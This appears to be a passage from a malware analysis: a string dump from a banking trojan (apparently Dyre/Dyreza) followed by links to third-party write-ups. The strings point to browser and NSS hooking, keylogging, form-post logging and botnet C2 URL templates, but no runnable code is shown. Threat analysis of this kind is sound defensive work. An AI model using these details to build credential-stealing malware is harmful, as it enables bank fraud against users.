9POST
=HTTPt
=POST
x"tXSV
=GETt
=PUTt
=POST
VWjj
=HTTPt

=POST
=GETt
=PUTt
=POST
VWjj
9POST
=HTTPt
=POST
GETt
PUTt
SSPh@
wY0!w
LoadLibraryExW
/%s/%s/%d/%s/
/%s/%s/%d/%s/%s/
%s/%s/0
error
/%s/%s/63/checkfile/%s/%s/
Wget/1.9+cvs-stable (Red Hat modified)
/%s/%s/63/file/%s/%s/%s/
sfile
text/plain; charset=UTF-8
text/plain; charset=UTF-16
image/jpeg
application/octet-stream
text/plain
%sbound%d
Content-Disposition: form-data; name="%s"
Content-Type:
%s
Content-Type: multipart/form-data; boundary=
Content-Length:
Accept: text/html
Connection: Keep-Alive
Content-Length:
Host:
Connection:
Transfer-Encoding:
Cookie:
Referer:
X-CSRF-Token:
X-Requested-With:
Content-Type:

NSPR4.DLL
NSS3.DLL
PR_Read
PR_Write
PR_Close
RapportGP.dll
CreateProcessInternalW
gdm12479s:
litem
saddr
server
serverlist
<rpci
</rpci>
wininet.dll
Send wininet.dll failed
Check wininet.dll on server failed
Error code %x, %s
Error code %x
AUTOBACKCONN
logkeys
not_support
logpost
X-Forwarded-For: %s
BotInfo:%s%s
success
0.0.0.0:0
botnetfail
127.0.0.1
XXXXXXXXXXXXXXXXXXXXXXXXxbotidremoved
1609uk4
0.0.0.0
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">
<security>
<requestedPrivileges>
<requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel>
</requestedPrivileges>
</security>
</trustInfo>
</assembly>PAPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPAD

0E0N0
3P3T3
chrome.dll
kernel32.dll
\\.\pipe\cmvn5e4d4r
WinInet.dll
kernelbase.dll
iexplore.exe!test
\system32\wininet.dll
firefox.exe
chrome.exe
iexplore.exe

Third Party Analysis


http://phishme.com/project-dyre-new-rat-slurps-bank-credentials-bypasses-ssl/
http://blog.spiderlabs.com/2014/07/analysis-of-a-banking-trojan-spammed-by-cutwail.html
https://techhelplist.com/index.php/spam-list/511-sage-accounting-invoice-nnn-virus
http://www.proofpoint.com/threatinsight/posts/dyreza-as-a-service.php
http://thegoldenmessenger.blogspot.com/2014/07/dyrebankerakacdilakawin32win64.html
http://www.virusradar.com/en/Win32_Battdil/chart/history
http://stopmalvertising.com/malware-reports/analysis-of-dyreza-changes-network-traffic.html
http://blog.trendmicro.com/trendlabs-security-intelligence/a-closer-look-at-dyre-malware-part-1/

Oldest discussion on FireFox hooking
http://forums.mozillazine.org/viewtopic.php?t=514691
